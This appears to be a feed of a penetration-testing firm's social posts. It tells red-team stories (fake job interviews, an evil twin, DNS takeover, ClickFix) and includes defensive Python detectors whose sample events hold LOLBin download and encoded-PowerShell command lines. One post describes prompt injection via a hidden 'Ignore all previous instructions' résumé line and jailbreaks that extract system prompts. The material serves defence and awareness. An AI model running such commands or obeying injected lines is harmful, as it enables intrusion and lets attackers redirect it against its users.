🧪 Volkis Lab: Privilege Escalation
You don't need exploits when the system hands you the right tool.
🐺 Can you spot it?
Posts by Volkis
Another happy customer review came through today.
In a recent red team engagement, we needed to get close to the target office, which was on the 15th floor of a skyscraper. It was too difficult to get to the elevators without having an ID badge, so we thought about good excuses to have them let us in.
Through our OSINT, we noticed that they were hiring a bookkeeper for their finance team. We figured the interviews would be held at the office. That was our in.
Two of us polished up our (completely fabricated) resumés and scored an interview! Everything was going to plan. We turned up for our interview on the day with a laptop in our backpack, running an evil twin attack on their WPA2-Enterprise network.
We signed in and sat down, waiting to be called. Everyone believed we were just there for the job. Partly true, since we were doing our job.
2 fake resumés and very awkward job interviews later, we captured an auth attempt on our evil twin that gained us a foothold into their enterprise network. We also dropped a Raspberry Pi on an ethernet port on the way out!
We didn't get the job, but we got domain admin.
#HackingStories 🐺
It is common to think an AI agent is safe because it only handles "public" data.
But the most dangerous instructions aren't written by developers.
They are the "injected" commands 👇
🐺 A hidden "Ignore all previous instructions" line in a resume.
🐺 Malicious prompts in website metadata to redirect output.
🐺 "Jailbreaks" that trick models into revealing system prompts.
We don't need to hack code to change how apps behave. We just feed the AI a hidden command and let it summarise our resume in a favourable light. 🐺
#VolkisExplains
We did this pentest recently where we got Domain Admin. Cool, but we wanted more! We had the admin's creds so we just waited...
When the admin logged out and left for the day, we just logged back in through RDP as him!
We browsed to the M365 admin panel and yep, Global Admin privilege.
The password vault icon was also on the desktop. Double-click, punch in creds, straight in! The passwords to all their SaaS platforms were right there.
Sometimes it pays to work late. 🐺
#HackingStories
🧪 Volkis Lab: This seems suspicious, doesn't it?
Sleep → Decode → Decrypt → Runtime API resolution → explorer.exe
🐺 Name the technique.
Drop the ATT&CK ID if you know it.
Does guessing or brute-forcing passwords still work? Yep!
CompanyName123, Monday2026!, Commodore#1... We still see these, and they're often our foothold into a network.
But instead of trying multiple passwords against one account, we try a few passwords against ALL accounts. That's how password spraying works.
It's okay! Go change your password if you need to. 🐺
#VolkExplains
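The spray-versus-brute-force distinction above is exactly what a detection has to key on: spraying looks like a small number of failures per account spread across many accounts from one source, not a pile of failures on one account. This is an added example, not Volkis tooling; the log lines and IPs are constructed.

```python
"""Tell password spraying from brute force in authentication logs.

Added example, not Volkis tooling; log lines are constructed in a
simplified "timestamp user source result" format."""
from collections import defaultdict

SAMPLE_LOG = """\
2026-03-02T09:00:01 alice 203.0.113.7 FAIL
2026-03-02T09:00:02 bob 203.0.113.7 FAIL
2026-03-02T09:00:03 carol 203.0.113.7 FAIL
2026-03-02T09:00:04 dave 203.0.113.7 FAIL
2026-03-02T09:00:05 erin 203.0.113.7 SUCCESS
2026-03-02T09:05:00 alice 198.51.100.9 FAIL
2026-03-02T09:05:01 alice 198.51.100.9 FAIL
2026-03-02T09:05:02 alice 198.51.100.9 FAIL
2026-03-02T09:05:03 alice 198.51.100.9 FAIL
2026-03-02T09:10:30 grace 192.0.2.5 SUCCESS
"""


def classify_sources(log_text, min_fails=4):
    """Map source IP -> (label, distinct_failed_users, fail_count, successes).

    "spray": >= min_fails failures spread over >= min_fails accounts.
    "bruteforce": as many failures, but against fewer accounts.
    successes lists accounts that then logged in from such a source:
    the likely foothold, and the first ones to reset and investigate.
    """
    fails = defaultdict(int)         # source -> failed attempts
    failed_users = defaultdict(set)  # source -> accounts that failed
    ok_users = defaultdict(set)      # source -> accounts that succeeded
    for line in log_text.splitlines():
        _ts, user, src, result = line.split()
        if result == "FAIL":
            fails[src] += 1
            failed_users[src].add(user)
        else:
            ok_users[src].add(user)
    verdicts = {}
    for src in set(fails) | set(ok_users):
        n, users = fails[src], len(failed_users[src])
        if n < min_fails:
            label = "benign"
        elif users >= min_fails:
            label = "spray"
        else:
            label = "bruteforce"
        successes = sorted(ok_users[src]) if label != "benign" else []
        verdicts[src] = (label, users, n, successes)
    return verdicts
```

Note that a real spray is usually slow (one guess per account per hour or day), so the window you aggregate over matters more than the threshold.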
Hackers don't need fancy tooling anymore; the target system carries it for us.
We can "live off the land".
Your PowerShell. Your MSHTA. Your CERTUTIL.
Your tools, our commands.
#HackingTips
🧪 Volkis Lab: Can you recognise it?
Bonus: Drop the MITRE ATT&CK ID 🐺
Pumping yourself up to write a pentest report on a Friday afternoon 🐺
🧪 Volkis Lab: Got a reverse shell?
Don't rush into recon or privilege escalation.
Raw, fragile access gets you caught.
Stabilise it first.
Control before capability.
Drop your thoughts 🐺
We were on a red team engagement searching through the external infrastructure for a way in.
Struggling for a way in, a junior asked: "What about DNS?"
That comment made us zoom out a notch.
We looked back through the DNS resolutions in our recon data and noticed that the staff.example[.]com subdomain was returning "REFUSED".
The DNS was also being handled by a cloud DNS provider that is vulnerable to DNS takeovers.
We were able to take full DNS control of *.staff[.]example[.]com and create our own user@staff[.]example[.]com email addresses.
That made our phishing engagements a piece of cake!
#VolkExplains 🐺
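The REFUSED answer in the story is the tell a defender can audit for: a subdomain delegated to nameservers outside your own domain, where those nameservers no longer have a zone configured for it. This is an added example, not Volkis tooling; the records and provider hostnames are constructed placeholders.

```python
"""Spot dangling third-party subdomain delegations in recon data.

Added example, not Volkis tooling. A delegation is a takeover candidate
when a subdomain's NS records point at nameservers outside the
organisation's own domain AND those servers answer REFUSED (or SERVFAIL):
the delegation is live, but nobody currently serves the zone there.
The records below are constructed; build real ones from `dig NS` plus a
SOA query sent directly to each delegated nameserver."""

# Constructed: zone, its NS hosts, and the rcode each NS returns for a
# SOA query of that zone. Provider hostnames are placeholders.
RECON = [
    {"zone": "example.com",
     "ns": ["ns1.example.com", "ns2.example.com"],
     "rcodes": {"ns1.example.com": "NOERROR", "ns2.example.com": "NOERROR"}},
    {"zone": "staff.example.com",
     "ns": ["ns-a.clouddns-provider.example", "ns-b.clouddns-provider.example"],
     "rcodes": {"ns-a.clouddns-provider.example": "REFUSED",
                "ns-b.clouddns-provider.example": "REFUSED"}},
    {"zone": "shop.example.com",
     "ns": ["ns-a.clouddns-provider.example"],
     "rcodes": {"ns-a.clouddns-provider.example": "NOERROR"}},
    {"zone": "unrelated.example.org",
     "ns": ["ns-a.clouddns-provider.example"],
     "rcodes": {"ns-a.clouddns-provider.example": "REFUSED"}},
]


def in_domain(host, apex):
    """True if host is apex itself or a name underneath it."""
    return host == apex or host.endswith("." + apex)


def dangling_delegations(records, apex, bad_rcodes=("REFUSED", "SERVFAIL")):
    """Return {zone: [external nameservers that refuse the zone]}.

    Only zones under apex are checked, and only nameservers outside apex
    count as third party; in-house servers answering REFUSED are a
    misconfiguration, not a takeover risk, and are left out here.
    """
    findings = {}
    for rec in records:
        if not in_domain(rec["zone"], apex):
            continue
        external = [ns for ns in rec["ns"] if not in_domain(ns, apex)]
        broken = [ns for ns in external if rec["rcodes"].get(ns) in bad_rcodes]
        if broken:
            findings[rec["zone"]] = broken
    return findings
```

The fix for a hit is either to recreate the zone at the provider or, better, to delete the stale NS delegation from the parent zone.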
Throughout many years in cybersecurity, we've learned a hard lesson.
Cybersecurity is not the most important thing.
Let me explain 👇
It's common to enumerate your attack surface using DNS records. But the weakest systems usually aren't in DNS.
They are the ones that have drifted: 👇
🐺 Forgotten project staging
🐺 Forgotten IPs
🐺 Active hosts that are no longer monitored
This is where we usually find the vulns!
#VolkExplains
🧪 Volkis Lab: What attack would you do and what tool(s) would you use?
The scan is telling you everything if you know how to read it.
Drop your answers below 🐺
The company rolled out a new webpage. It looked normal. Just another page asking you to "verify you're human."
It was a ClickFix attack. 👇
Simple steps:
1. Win + R.
2. Ctrl + V.
3. Enter.
Nothing felt risky, so they followed along without thinking.
Nothing crashed or popped. Just like that, we got in.
#HackingStories #VolkExplains
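The ClickFix post above and the earlier "live off the land" post (PowerShell, MSHTA, CERTUTIL) describe the same telemetry from the defender's side: a built-in binary launched with download, decode or hidden-window arguments, and in the ClickFix case launched from the Run dialog, so its parent is explorer.exe. This is an added example, not Volkis tooling; the events are constructed and the rules are a starting set, not a complete one.

```python
"""Triage process-creation events for living-off-the-land binaries.

Added example, not Volkis tooling. Events are constructed in a reduced
Sysmon-like shape (parent image, image, command line); the rule set is a
small starting point to tune against your own baseline, not a complete one.
"""
import re

EVENTS = [
    ("explorer.exe", "powershell.exe", "powershell -w hidden -nop -enc QQBCAEMA"),
    ("explorer.exe", "mshta.exe", "mshta https://cdn.example.net/verify.hta"),
    ("cmd.exe", "certutil.exe",
     "certutil -urlcache -split -f https://files.example.net/p.txt p.txt"),
    ("svchost.exe", "powershell.exe", "powershell -File C:\\Scripts\\backup.ps1"),
    ("explorer.exe", "notepad.exe", "notepad readme.txt"),
]

# (image, pattern over the command line, what a match indicates)
RULES = [
    ("powershell.exe",
     re.compile(r"\s-(enc|e|ec|encodedcommand)\b|-w(indowstyle)?\s+hidden"
                r"|downloadstring|\biex\b|invoke-expression", re.I),
     "encoded, hidden or remote-loading PowerShell"),
    ("mshta.exe", re.compile(r"https?://|javascript:|vbscript:", re.I),
     "mshta running remote or inline script"),
    ("certutil.exe", re.compile(r"-urlcache|-decode|-encode", re.I),
     "certutil used as a downloader or decoder"),
]


def triage(events):
    """Return (image, reason, severity) for each event that matches a rule.

    Severity is "high" when the parent is explorer.exe: that is what a
    command pasted into the Win+R Run dialog by a user looks like (the
    ClickFix pattern), as opposed to a scheduled task or service parent.
    """
    findings = []
    for parent, image, cmdline in events:
        for rule_image, pattern, reason in RULES:
            if image.lower() == rule_image and pattern.search(cmdline):
                severity = "high" if parent.lower() == "explorer.exe" else "medium"
                findings.append((image, reason, severity))
                break
    return findings
```

On Windows the Run dialog also records what was typed under the current user's RunMRU registry key, which gives the incident responder a second place to confirm a ClickFix paste after the fact.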
Nothing annoys us, as attackers, more than well-placed honeypots/tokens. It makes us paranoid at every step.
That's good! 👇
- AD User Object
- Printer
- Cert Template
☝️ Some of the most frustrating examples.
Sometimes the best defence is letting the attacker believe they succeeded. 🐺
#VolkExplains